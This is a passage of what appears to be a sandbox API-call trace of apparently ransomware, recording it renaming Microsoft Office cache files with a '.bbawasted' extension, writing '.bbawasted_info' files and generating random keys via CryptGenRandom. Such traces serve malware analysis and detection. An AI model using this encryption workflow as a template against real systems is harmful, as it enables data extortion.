users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.bbawasted")) returned 1 [0068.523] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0068.523] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0068.523] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x333 [0068.523] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x570000 [0068.523] CloseHandle (hObject=0x120) returned 1 [0068.527] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.527] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bef78 | out: pbBuffer=0x5bef78) returned 1 [0068.527] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.528] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.528] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.528] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.538] SetEndOfFile (hFile=0x110) returned 1 [0068.540] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc480 | out: hHeap=0x580000) returned 1 [0068.540] CloseHandle (hObject=0x110) returned 1 [0068.541] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.541] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0650 | out: hHeap=0x580000) returned 1 [0068.541] _aulldvrm () returned 0x0 [0068.541] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.542] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.542] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.542] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0068.542] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5bef30 [0068.542] lstrcpyW (in: lpString1=0x5befc8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.542] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5dc070 [0068.542] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.543] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5dc070 | out: pbBuffer=0x5dc070) returned 1 [0068.543] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.543] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.544] WriteFile (in: hFile=0x110, lpBuffer=0x5dc070*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5dc070*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.545] SetEndOfFile (hFile=0x110) returned 1 [0068.545] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.545] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.545] lstrcpyW (in: lpString1=0x5befc8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0068.545] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0068.545] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0068.546] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0xa40 [0068.546] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa40) returned 0x570000 [0068.546] CloseHandle (hObject=0x114) returned 1 [0068.548] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.549] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5c77f8 | out: pbBuffer=0x5c77f8) returned 1 [0068.549] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.549] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.550] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.550] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.558] SetEndOfFile (hFile=0x110) returned 1 [0068.560] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc480 | out: hHeap=0x580000) returned 1 [0068.560] CloseHandle (hObject=0x110) returned 1 [0068.561] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bef30 | out: hHeap=0x580000) returned 1 [0068.561] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b9758 | out: hHeap=0x580000) returned 1 [0068.561] _aulldvrm () returned 0x0 [0068.561] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.562] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.562] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.562] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0068.562] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5bef30 [0068.562] lstrcpyW (in: lpString1=0x5befd2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.562] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5dc070 [0068.562] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.563] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5dc070 | out: pbBuffer=0x5dc070) returned 1 [0068.563] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.563] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.564] WriteFile (in: hFile=0x110, lpBuffer=0x5dc070*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5dc070*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.575] SetEndOfFile (hFile=0x110) returned 1 [0068.575] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.575] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.575] lstrcpyW (in: lpString1=0x5befd2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted")) returned 1 [0068.595] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0068.595] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0068.595] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x10b2 [0068.595] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x570000 [0068.595] CloseHandle (hObject=0x120) returned 1 [0068.601] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.601] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5c77f8 | out: pbBuffer=0x5c77f8) returned 1 [0068.601] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.601] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.602] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.602] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.610] SetEndOfFile (hFile=0x110) returned 1 [0068.612] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db478 | out: hHeap=0x580000) returned 1 [0068.613] CloseHandle (hObject=0x110) returned 1 [0068.614] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bef30 | out: hHeap=0x580000) returned 1 [0068.614] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0750 | out: hHeap=0x580000) returned 1 [0068.614] _aulldvrm () returned 0x0 [0068.614] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.615] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.615] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.615] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0068.615] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c0) returned 0x5c77b0 [0068.615] lstrcpyW (in: lpString1=0x5c7866, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.615] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5db068 [0068.615] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.616] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5db068 | out: pbBuffer=0x5db068) returned 1 [0068.616] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.616] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.616] WriteFile (in: hFile=0x110, lpBuffer=0x5db068*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5db068*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.617] SetEndOfFile (hFile=0x110) returned 1 [0068.617] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.617] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db068 | out: hHeap=0x580000) returned 1 [0068.617] lstrcpyW (in: lpString1=0x5c7866, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted")) returned 1 [0068.618] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0068.618] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0068.618] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0xaec3a [0068.618] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x11a0000 [0068.618] CloseHandle (hObject=0x114) returned 1 [0068.709] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5bad10) returned 1 [0068.710] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x1b8, pbBuffer=0x5dc310 | out: pbBuffer=0x5dc310) returned 1 [0068.710] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.710] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5bad10) returned 1 [0068.710] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.711] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.719] SetEndOfFile (hFile=0x110) returned 1 [0068.721] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0068.721] CloseHandle (hObject=0x110) returned 1 [0068.722] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.723] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf4a0 | out: hHeap=0x580000) returned 1 [0068.723] _aulldvrm () returned 0x0 [0068.723] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5bad10) returned 1 [0068.723] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.723] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.723] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0068.724] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5c77b0 [0068.724] lstrcpyW (in: lpString1=0x5c7852, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.724] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5dc2c8 [0068.724] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5bad10) returned 1 [0068.724] CryptGenRandom (in: hProv=0x5bad10, dwLen=0xa3a, pbBuffer=0x5dc2c8 | out: pbBuffer=0x5dc2c8) returned 1 [0068.724] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.724] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.725] WriteFile (in: hFile=0x110, lpBuffer=0x5dc2c8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5dc2c8*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.726] SetEndOfFile (hFile=0x110) returned 1 [0068.726] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.726] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc2c8 | out: hHeap=0x580000) returned 1 [0068.726] lstrcpyW (in: lpString1=0x5c7852, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.bbawasted")) returned 1 [0068.769] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0068.769] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0068.769] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x41d4 [0068.769] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41d4) returned 0x570000 [0068.769] CloseHandle (hObject=0x120) returned 1 [0068.772] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5bad10) returned 1 [0068.773] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x1b8, pbBuffer=0x5db308 | out: pbBuffer=0x5db308) returned 1 [0068.773] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.773] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5bad10) returned 1 [0068.774] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.774] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.783] SetEndOfFile (hFile=0x110) returned 1 [0068.785] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db8d8 | out: hHeap=0x580000) returned 1 [0068.785] CloseHandle (hObject=0x110) returned 1 [0068.787] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.787] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0a50 | out: hHeap=0x580000) returned 1 [0068.787] _aulldvrm () returned 0x0 [0068.787] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5bad10) returned 1 [0068.788] CryptGenRandom (in: hProv=0x5bad10, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.788] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0068.788] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5c77b0 [0068.788] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.788] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5db2c0 [0068.788] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5bad10) returned 1 [0068.789] CryptGenRandom (in: hProv=0x5bad10, dwLen=0xa3a, pbBuffer=0x5db2c0 | out: pbBuffer=0x5db2c0) returned 1 [0068.789] CryptReleaseContext (hProv=0x5bad10, dwFlags=0x0) returned 1 [0068.789] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.789] WriteFile (in: hFile=0x110, lpBuffer=0x5db2c0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5db2c0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.790] SetEndOfFile (hFile=0x110) returned 1 [0068.790] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.790] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db2c0 | out: hHeap=0x580000) returned 1 [0068.790] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0068.792] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0068.792] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0068.792] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x7976 [0068.792] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 